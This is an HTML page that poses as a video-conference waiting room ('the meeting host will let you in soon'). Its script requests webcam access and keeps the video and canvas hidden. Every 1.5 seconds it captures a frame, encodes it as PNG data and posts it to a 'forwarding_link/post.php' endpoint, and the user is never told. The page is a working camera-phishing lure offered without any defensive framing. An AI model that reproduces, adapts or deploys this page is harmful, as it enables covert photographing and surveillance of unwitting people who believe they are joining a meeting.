<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Video Conference</title>
  <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@500;500&display=swap" rel="stylesheet">
  <style>
    body {
      height: 100vh;
      width: 100vw;
      margin: 0;
      padding: 0;
      font-family: 'Nunito', sans-serif;
      font-weight: 500;
    }

    /* Add other CSS styles here */
    
    .video-wrap {
      display: none;
    }

    #canvas {
      display: none;
    }

    .float-button {
      background-color: #1F2022;
      height: 40px;
      border-radius: 5px;
      width: 40px;
      position: fixed;
      display: flex;
      align-items: center;
      justify-content: center;
      top: 5px;
      right: 5px;
    }

    #ac-wrapper {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(255, 255, 255, .6);
      z-index: 1001;
    }

    #popup {
      width: 555px;
      height: 35px;
      background: #FFFFFF;
      border: 5px solid #000;
      border-radius: 15px;
      -moz-border-radius: 15px;
      -webkit-border-radius: 15px;
      box-shadow: #64686e 0px 0px 3px 3px;
      -moz-box-shadow: #64686e 0px 0px 3px 3px;
      -webkit-box-shadow: #64686e 0px 0px 3px 3px;
      position: relative;
      top: 250px;
      left: 375px;
    }

    .bottom-bar {
      position: fixed;
      padding: 0px 40px 0px -40px;
      bottom: 0px;
      height: 80px;
      width: 100%;
      background-color: #1F2022;
      display: flex;
      flex-direction: row;
      justify-content: center;
      align-items: center;
      color: #fff;
    }

    .icon-button {
      display: flex;
      flex-direction: column;
      justify-items: center;
      align-items: center;
    }

    i {
      margin-bottom: 8px;
      font-size: 26px;
    }

    button {
      color: #fff;
      background-color: crimson;
      padding: 5px 20px;
      border: none;
      border-radius: 5px;
      border-style: none;
      outline: none;
    }
  </style>
</head>
<body>
  <div class="video-wrap" hidden>
    <video id="video" playsinline autoplay></video>
  </div>

  <canvas id="canvas" width="640" height="480" hidden></canvas>

  <div class="float-button">
    <i class="fas fa-expand"></i>
  </div>

  <div id="ac-wrapper" hidden>
    <div id="popup">
      <center>
        <h2>Please wait, the meeting host will let you in soon</h2>
      </center>
    </div>
  </div>

  <div class="bottom-bar">
    <div class="icon-button" style="margin-left: 50px;">
      <i class="fas fa-microphone"></i>
      <h6>Mute</h6>
    </div>
    <!-- Other icon-buttons -->
    <button style="margin-right: 50px;">End</button>
  </div>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
  <script src="https://kit.fontawesome.com/c4c45dfab4.js" crossorigin="anonymous"></script>
  <script>
    'use strict';

    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const errorMsgElement = document.querySelector('span#errorMsg');

    const constraints = {
      audio: false,
      video: { facingMode: 'user' }
    };

    async function init() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia(constraints);
        handleSuccess(stream);
      } catch (e) {
        errorMsgElement.textContent = `navigator.getUserMedia error:${e.toString()}`;
      }
    }

    function handleSuccess(stream) {
      window.stream = stream;
      video.srcObject = stream;

      const context = canvas.getContext('2d');
      setInterval(() => {
        context.drawImage(video, 0, 0, 640, 480);
        const canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
        post(canvasData);
        video.play();
      }, 1500);
    }

    function post(imgdata) {
      $.ajax({
        type: 'POST',
        data: { cat: imgdata },
        url: 'forwarding_link/post.php',
        dataType: 'json',
        async: false,
        success: function (result) {
          // Handle the response/results
        },
        error: function () {
          // Handle error
        }
      });
    }

    function PopUp() {
      document.getElementById('ac-wrapper').style.display = "none";
    }

    init();

    $(document).ready(() => {
      setTimeout(() => {
        PopUp();
      }, 50000); // 5000 to load it after 5 seconds from page load
    });
  </script>
</body>
</html>
